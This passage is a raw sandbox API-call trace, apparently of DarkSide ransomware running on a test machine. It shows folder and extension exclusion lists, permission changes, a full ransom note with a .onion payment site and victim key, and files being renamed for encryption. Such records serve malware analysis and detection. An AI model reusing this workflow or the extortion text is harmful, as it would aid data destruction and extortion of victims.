RtlComputeCrc32 (PartialCrc=0xc4c6, Buffer=0x2690094, Length=0x80) returned 0x9cfac1d9 [0156.462] RtlComputeCrc32 (PartialCrc=0xc1d9, Buffer=0x2690094, Length=0x80) returned 0x33747c26 [0156.463] RtlComputeCrc32 (PartialCrc=0x7c26, Buffer=0x2690094, Length=0x80) returned 0x9d1a564f [0156.463] RtlComputeCrc32 (PartialCrc=0x564f, Buffer=0x2690094, Length=0x80) returned 0x41da4247 [0156.463] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0156.463] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.463] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.463] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcebd5680, ftCreationTime.dwHighDateTime=0x1d5e535, ftLastAccessTime.dwLowDateTime=0xd59b19c0, ftLastAccessTime.dwHighDateTime=0x1d5e796, ftLastWriteTime.dwLowDateTime=0xd59b19c0, ftLastWriteTime.dwHighDateTime=0x1d5e796, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZIqq01CnHJJwR", cAlternateFileName="ZIQQ01~1")) returned 1 [0156.463] _wcsicmp (_Str1="$recycle.bin", _Str2="ZIqq01CnHJJwR") returned -86 [0156.463] wcslen (_String="$recycle.bin") returned 0xc [0156.463] _wcsicmp (_Str1="config.msi", _Str2="ZIqq01CnHJJwR") returned -23 [0156.463] wcslen (_String="config.msi") returned 0xa [0156.463] _wcsicmp (_Str1="$windows.~bt", _Str2="ZIqq01CnHJJwR") returned -86 [0156.463] wcslen (_String="$windows.~bt") returned 0xc [0156.463] _wcsicmp (_Str1="$windows.~ws", _Str2="ZIqq01CnHJJwR") returned -86 [0156.463] wcslen (_String="$windows.~ws") returned 0xc [0156.463] _wcsicmp (_Str1="windows", _Str2="ZIqq01CnHJJwR") returned -3 [0156.463] wcslen (_String="windows") returned 0x7 [0156.463] _wcsicmp (_Str1="appdata", _Str2="ZIqq01CnHJJwR") returned -25 [0156.463] wcslen (_String="appdata") returned 0x7 [0156.463] _wcsicmp (_Str1="application data", _Str2="ZIqq01CnHJJwR") returned -25 [0156.463] wcslen (_String="application data") returned 0x10 [0156.463] _wcsicmp (_Str1="boot", _Str2="ZIqq01CnHJJwR") returned -24 [0156.463] wcslen (_String="boot") returned 0x4 [0156.463] _wcsicmp (_Str1="google", _Str2="ZIqq01CnHJJwR") returned -19 [0156.463] wcslen (_String="google") returned 0x6 [0156.463] _wcsicmp (_Str1="mozilla", _Str2="ZIqq01CnHJJwR") returned -13 [0156.463] wcslen (_String="mozilla") returned 0x7 [0156.463] _wcsicmp (_Str1="program files", _Str2="ZIqq01CnHJJwR") returned -10 [0156.463] wcslen (_String="program files") returned 0xd [0156.463] _wcsicmp (_Str1="program files (x86)", _Str2="ZIqq01CnHJJwR") returned -10 [0156.464] wcslen (_String="program files (x86)") returned 0x13 [0156.464] _wcsicmp (_Str1="programdata", _Str2="ZIqq01CnHJJwR") returned -10 [0156.464] wcslen (_String="programdata") returned 0xb [0156.464] _wcsicmp (_Str1="system volume information", _Str2="ZIqq01CnHJJwR") returned -7 [0156.464] wcslen (_String="system volume information") returned 0x19 [0156.464] _wcsicmp (_Str1="tor browser", _Str2="ZIqq01CnHJJwR") returned -6 [0156.464] wcslen (_String="tor browser") returned 0xb [0156.464] _wcsicmp (_Str1="windows.old", _Str2="ZIqq01CnHJJwR") returned -3 [0156.464] wcslen (_String="windows.old") returned 0xb [0156.464] _wcsicmp (_Str1="intel", _Str2="ZIqq01CnHJJwR") returned -17 [0156.464] wcslen (_String="intel") returned 0x5 [0156.464] _wcsicmp (_Str1="msocache", _Str2="ZIqq01CnHJJwR") returned -13 [0156.464] wcslen (_String="msocache") returned 0x8 [0156.464] _wcsicmp (_Str1="perflogs", _Str2="ZIqq01CnHJJwR") returned -10 [0156.464] wcslen (_String="perflogs") returned 0x8 [0156.464] _wcsicmp (_Str1="x64dbg", _Str2="ZIqq01CnHJJwR") returned -2 [0156.464] wcslen (_String="x64dbg") returned 0x6 [0156.464] _wcsicmp (_Str1="public", _Str2="ZIqq01CnHJJwR") returned -10 [0156.464] wcslen (_String="public") returned 0x6 [0156.464] _wcsicmp (_Str1="all users", _Str2="ZIqq01CnHJJwR") returned -25 [0156.464] wcslen (_String="all users") returned 0x9 [0156.464] _wcsicmp (_Str1="default", _Str2="ZIqq01CnHJJwR") returned -22 [0156.464] wcslen (_String="default") returned 0x7 [0156.464] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" [0156.464] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 0x2b [0156.464] wcscpy (in: _Dest=0x32200a4, _Source="ZIqq01CnHJJwR" | out: _Dest="ZIqq01CnHJJwR") returned="ZIqq01CnHJJwR" [0156.464] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.464] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.465] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.465] GetNamedSecurityInfoW () returned 0x0 [0156.465] SetEntriesInAclW () returned 0x0 [0156.465] SetNamedSecurityInfoW () returned 0x0 [0156.471] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17c1d0) returned 1 [0156.471] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.471] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 1 [0156.471] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0156.471] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0156.472] WriteFile (in: hFile=0x1c, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0156.473] CloseHandle (hObject=0x1c) returned 1 [0156.473] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.473] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.473] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\") returned="" [0156.473] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\") returned 0x38 [0156.473] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x17c1d0 [0156.473] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcebd5680, ftCreationTime.dwHighDateTime=0x1d5e535, ftLastAccessTime.dwLowDateTime=0x8af64220, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8af64220, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.474] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd4752d0, ftCreationTime.dwHighDateTime=0x1d5dd5b, ftLastAccessTime.dwLowDateTime=0x3ef8cb70, ftLastAccessTime.dwHighDateTime=0x1d5e4df, ftLastWriteTime.dwLowDateTime=0x3ef8cb70, ftLastWriteTime.dwHighDateTime=0x1d5e4df, nFileSizeHigh=0x0, nFileSizeLow=0x126d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="8x2Frw4GPMex.jpg", cAlternateFileName="8X2FRW~1.JPG")) returned 1 [0156.474] _wcsicmp (_Str1="8x2Frw4GPMex.jpg", _Str2="README.c06622a1.TXT") returned -58 [0156.474] wcsstr (_Str="8x2Frw4GPMex.jpg", _SubStr="README") returned 0x0 [0156.474] _wcsicmp (_Str1="autorun.inf", _Str2="8x2Frw4GPMex.jpg") returned 41 [0156.474] wcslen (_String="autorun.inf") returned 0xb [0156.474] _wcsicmp (_Str1="boot.ini", _Str2="8x2Frw4GPMex.jpg") returned 42 [0156.474] wcslen (_String="boot.ini") returned 0x8 [0156.474] _wcsicmp (_Str1="bootfont.bin", _Str2="8x2Frw4GPMex.jpg") returned 42 [0156.474] wcslen (_String="bootfont.bin") returned 0xc [0156.474] _wcsicmp (_Str1="bootsect.bak", _Str2="8x2Frw4GPMex.jpg") returned 42 [0156.474] wcslen (_String="bootsect.bak") returned 0xc [0156.474] _wcsicmp (_Str1="desktop.ini", _Str2="8x2Frw4GPMex.jpg") returned 44 [0156.474] wcslen (_String="desktop.ini") returned 0xb [0156.474] _wcsicmp (_Str1="iconcache.db", _Str2="8x2Frw4GPMex.jpg") returned 49 [0156.474] wcslen (_String="iconcache.db") returned 0xc [0156.475] _wcsicmp (_Str1="ntldr", _Str2="8x2Frw4GPMex.jpg") returned 54 [0156.475] wcslen (_String="ntldr") returned 0x5 [0156.475] _wcsicmp (_Str1="ntuser.dat", _Str2="8x2Frw4GPMex.jpg") returned 54 [0156.475] wcslen (_String="ntuser.dat") returned 0xa [0156.475] _wcsicmp (_Str1="ntuser.dat.log", _Str2="8x2Frw4GPMex.jpg") returned 54 [0156.475] wcslen (_String="ntuser.dat.log") returned 0xe [0156.475] _wcsicmp (_Str1="ntuser.ini", _Str2="8x2Frw4GPMex.jpg") returned 54 [0156.475] wcslen (_String="ntuser.ini") returned 0xa [0156.475] _wcsicmp (_Str1="thumbs.db", _Str2="8x2Frw4GPMex.jpg") returned 60 [0156.475] wcslen (_String="thumbs.db") returned 0x9 [0156.475] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0156.475] wcslen (_String="386") returned 0x3 [0156.475] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0156.475] wcslen (_String="adv") returned 0x3 [0156.475] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0156.475] wcslen (_String="ani") returned 0x3 [0156.475] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0156.475] wcslen (_String="bat") returned 0x3 [0156.475] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0156.475] wcslen (_String="bin") returned 0x3 [0156.475] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0156.475] wcslen (_String="cab") returned 0x3 [0156.475] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0156.475] wcslen (_String="cmd") returned 0x3 [0156.475] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0156.475] wcslen (_String="com") returned 0x3 [0156.475] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0156.475] wcslen (_String="cpl") returned 0x3 [0156.475] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0156.475] wcslen (_String="cur") returned 0x3 [0156.475] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0156.475] wcslen (_String="deskthemepack") returned 0xd [0156.475] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0156.476] wcslen (_String="diagcab") returned 0x7 [0156.476] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0156.476] wcslen (_String="diagcfg") returned 0x7 [0156.476] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0156.476] wcslen (_String="diagpkg") returned 0x7 [0156.476] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0156.476] wcslen (_String="dll") returned 0x3 [0156.476] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0156.476] wcslen (_String="drv") returned 0x3 [0156.476] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0156.476] wcslen (_String="exe") returned 0x3 [0156.476] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0156.476] wcslen (_String="hlp") returned 0x3 [0156.476] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0156.476] wcslen (_String="icl") returned 0x3 [0156.476] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0156.476] wcslen (_String="icns") returned 0x4 [0156.476] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0156.476] wcslen (_String="ico") returned 0x3 [0156.476] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0156.476] wcslen (_String="ics") returned 0x3 [0156.476] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0156.476] wcslen (_String="idx") returned 0x3 [0156.476] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0156.476] wcslen (_String="ldf") returned 0x3 [0156.476] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0156.476] wcslen (_String="lnk") returned 0x3 [0156.476] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0156.476] wcslen (_String="mod") returned 0x3 [0156.476] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0156.476] wcslen (_String="mpa") returned 0x3 [0156.477] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0156.477] wcslen (_String="msc") returned 0x3 [0156.477] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0156.477] wcslen (_String="msp") returned 0x3 [0156.477] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0156.477] wcslen (_String="msstyles") returned 0x8 [0156.477] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0156.477] wcslen (_String="msu") returned 0x3 [0156.477] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0156.477] wcslen (_String="nls") returned 0x3 [0156.477] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0156.477] wcslen (_String="nomedia") returned 0x7 [0156.477] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0156.477] wcslen (_String="ocx") returned 0x3 [0156.477] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0156.477] wcslen (_String="prf") returned 0x3 [0156.477] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0156.477] wcslen (_String="ps1") returned 0x3 [0156.477] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0156.477] wcslen (_String="rom") returned 0x3 [0156.477] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0156.477] wcslen (_String="rtp") returned 0x3 [0156.477] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0156.477] wcslen (_String="scr") returned 0x3 [0156.477] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0156.477] wcslen (_String="shs") returned 0x3 [0156.477] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0156.477] wcslen (_String="spl") returned 0x3 [0156.477] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0156.477] wcslen (_String="sys") returned 0x3 [0156.477] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0156.477] wcslen (_String="theme") returned 0x5 [0156.477] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0156.477] wcslen (_String="themepack") returned 0x9 [0156.478] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0156.478] wcslen (_String="wpx") returned 0x3 [0156.478] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0156.478] wcslen (_String="lock") returned 0x4 [0156.478] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0156.478] wcslen (_String="key") returned 0x3 [0156.478] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0156.478] wcslen (_String="hta") returned 0x3 [0156.478] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0156.478] wcslen (_String="msi") returned 0x3 [0156.478] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0156.478] wcslen (_String="pdb") returned 0x3 [0156.478] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0156.478] wcslen (_String="sqlite") returned 0x6 [0156.478] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.478] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.479] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.479] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned 0x37 [0156.479] wcscpy (in: _Dest=0x32400d0, _Source="8x2Frw4GPMex.jpg" | out: _Dest="8x2Frw4GPMex.jpg") returned="8x2Frw4GPMex.jpg" [0156.479] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\8x2Frw4GPMex.jpg", dwFileAttributes=0x80) returned 1 [0156.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\8x2Frw4GPMex.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\8x2frw4gpmex.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0156.479] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.479] ReadFile (in: hFile=0x1b8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.480] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xbe2bbecb [0156.480] RtlComputeCrc32 (PartialCrc=0xbecb, Buffer=0x32e9a4, Length=0x80) returned 0x9a11028e [0156.480] RtlComputeCrc32 (PartialCrc=0x28e, Buffer=0x32e9a4, Length=0x80) returned 0x624b88ce [0156.480] RtlComputeCrc32 (PartialCrc=0x88ce, Buffer=0x32e9a4, Length=0x80) returned 0x939f950f [0156.480] RtlComputeCrc32 (PartialCrc=0x950f, Buffer=0x32e9a4, Length=0x80) returned 0x7fc8ca38 [0156.480] CloseHandle (hObject=0x1b8) returned 1 [0156.480] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.480] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\8x2Frw4GPMex.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\8x2Frw4GPMex.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\8x2Frw4GPMex.jpg" [0156.480] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\8x2Frw4GPMex.jpg") returned 0x48 [0156.480] wcscpy (in: _Dest=0x32500f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.481] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\8x2Frw4GPMex.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\8x2frw4gpmex.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\8x2Frw4GPMex.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\8x2frw4gpmex.jpg.c06622a1"), dwFlags=0x8) returned 1 [0156.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\8x2Frw4GPMex.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\8x2frw4gpmex.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0156.491] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.491] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0156.499] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ff6d891 [0156.499] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f47005c [0156.499] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x60ecdb77 [0156.499] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfd0ee70 [0156.499] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x668968bf [0156.499] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x40880fb4 [0156.499] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x351e43b3 [0156.499] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2e29a67e [0156.502] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0xf7360c46 [0156.502] RtlComputeCrc32 (PartialCrc=0xc46, Buffer=0x2b70094, Length=0x80) returned 0x9bf750df [0156.502] RtlComputeCrc32 (PartialCrc=0x50df, Buffer=0x2b70094, Length=0x80) returned 0xd7157c0d [0156.502] RtlComputeCrc32 (PartialCrc=0x7c0d, Buffer=0x2b70094, Length=0x80) returned 0xc49960ed [0156.502] RtlComputeCrc32 (PartialCrc=0x60ed, Buffer=0x2b70094, Length=0x80) returned 0x35fc83d7 [0156.502] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0156.503] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.503] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.503] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97d0ae0, ftCreationTime.dwHighDateTime=0x1d5dc03, ftLastAccessTime.dwLowDateTime=0x54927220, ftLastAccessTime.dwHighDateTime=0x1d5e7b8, ftLastWriteTime.dwLowDateTime=0x54927220, ftLastWriteTime.dwHighDateTime=0x1d5e7b8, nFileSizeHigh=0x0, nFileSizeLow=0x14761, dwReserved0=0x0, dwReserved1=0x0, cFileName="AiMvEt9bBE9f9FGdQ.mp3", cAlternateFileName="AIMVET~1.MP3")) returned 1 [0156.503] _wcsicmp (_Str1="AiMvEt9bBE9f9FGdQ.mp3", _Str2="README.c06622a1.TXT") returned -17 [0156.503] wcsstr (_Str="AiMvEt9bBE9f9FGdQ.mp3", _SubStr="README") returned 0x0 [0156.503] _wcsicmp (_Str1="autorun.inf", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 12 [0156.503] wcslen (_String="autorun.inf") returned 0xb [0156.503] _wcsicmp (_Str1="boot.ini", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 1 [0156.503] wcslen (_String="boot.ini") returned 0x8 [0156.503] _wcsicmp (_Str1="bootfont.bin", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 1 [0156.503] wcslen (_String="bootfont.bin") returned 0xc [0156.503] _wcsicmp (_Str1="bootsect.bak", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 1 [0156.503] wcslen (_String="bootsect.bak") returned 0xc [0156.503] _wcsicmp (_Str1="desktop.ini", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 3 [0156.503] wcslen (_String="desktop.ini") returned 0xb [0156.503] _wcsicmp (_Str1="iconcache.db", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 8 [0156.503] wcslen (_String="iconcache.db") returned 0xc [0156.503] _wcsicmp (_Str1="ntldr", _Str2="AiMvEt9bBE9f9FGdQ.mp3") returned 13 [0156.503] wcslen 